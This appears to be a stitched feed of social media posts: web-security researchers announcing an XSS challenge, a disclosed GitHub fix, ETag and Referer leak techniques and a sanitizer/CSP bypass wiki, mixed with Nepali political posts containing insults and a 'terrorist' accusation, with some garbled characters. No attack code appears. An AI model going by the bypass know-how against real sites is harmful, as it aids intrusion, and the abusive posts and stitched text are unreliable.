Posting a mini XSS challenge! Goal is to pop an alert. I believe this trick is not well known. Intended solution is chrome only. Thanks to @kevin_mizu for beta testing! Don't post solutions in the thread; DM only!
https://t.co/v5LXrs5ORk
We responsibly disclosed the issue to @GitHub, who deployed a fix on https://t.co/SvN2lGsnbO the same day (!) and released patches for all supported GHES versions.
GitHub Enterprise Server customers are strongly encouraged to update immediately.
I started playing CTFs in 2022, and LLMs definitely changed the **competitive** CTF scene a lot, especially since mid-2025. I also started using LLMs in late 2025. Yes, those models did one-shot many challenges, but what's the fun of slopping them? I learned absolutely nothing 🥲
@DeSolti I feel ashamed to have studied in the same class as you. J ho tei dekhauda k bhayo? "timing this timing that".. Timro ghar ko kasailai kei bhako bhaye bujthyeu hola..
i built an entire x86 CPU emulator in CSS (no javascript)
you can write programs in C, compile them to x86 machine code with GCC, and run them inside CSS
Chrome implements referrerpolicy on <input type="image">, despite it not being in the HTML spec. Like on the in-spec elements, it takes precedence over the document policy for that request and can be abused to leak the page URL via the Referer header.
https://t.co/y2t4H4n43s
Cross-Site ETag Length Leak
https://t.co/RYofmHVh6T
I just posted the author writeup for impossible-leak in SECCON CTF 14 Quals. As far as I know, this is a new XS-Leak technique! The ETag header can become a side channel :)
प्रिय Gen Z,
तपाईहरूको योगदान र बलिदानबाट देशले परिवर्तन पाएको छ।
वीर सहिदहरूप्रति हार्दिक श्रद्धाञ्जली। तपाईंहरूको योगदान अमूल्य छ, जसले सधैं भावी पुस्ता���ाई देशप्रेम र कर्तव्यबोधको मार्गदर्शन गर्नेछ। तपाईहरूप्रति असिम स��्मान।
घाइतेहरूको शीघ्र स्वास्थ्यलाभको कामना गर्दछु।
तेरो भरौटेहरूको पो बा भइस् ।
साँच्चै नै कहिले बा हुन पाएको भए पो छोरा छोरीको मृत्युको पीडा बुज्थिस ।
यस्तो आतङ्क वाद यो विश्वले कहिले देखेको थिएन ।
त नेता त के मान्छे पनि बन्न सकेनस, आतङ्क बादी होस ।
#kpoliisterriorist
Turns out my #PHRACK article is live! 🔥
> The Art of PHP — My CTF Journey and Untold Stories!
Kinda a love letter to those CTF players & PHP nerds! Hope all the credit goes to the right ppl. Also huge thanks to @0xdea for not forgetting me, @guitmz for the edits, and the @Phrack crew for keeping it real! 🎉
https://t.co/BMCLlHti7q
I'm happy to release a script gadgets wiki inspired by the work of @slekies, @kkotowicz, and @sirdarckcat in their Black Hat USA 2017 talk! 🔥
The goal is to provide quick access to gadgets that help bypass HTML sanitizers and CSPs 👇
https://t.co/SgsSyxoEMR
1/4
It is pretty interesting that as I age and geohot ages, I end up noticing that we agree on more things than I thought in the past.
This here is a good read:
https://t.co/1QU0oVlWbi -- it's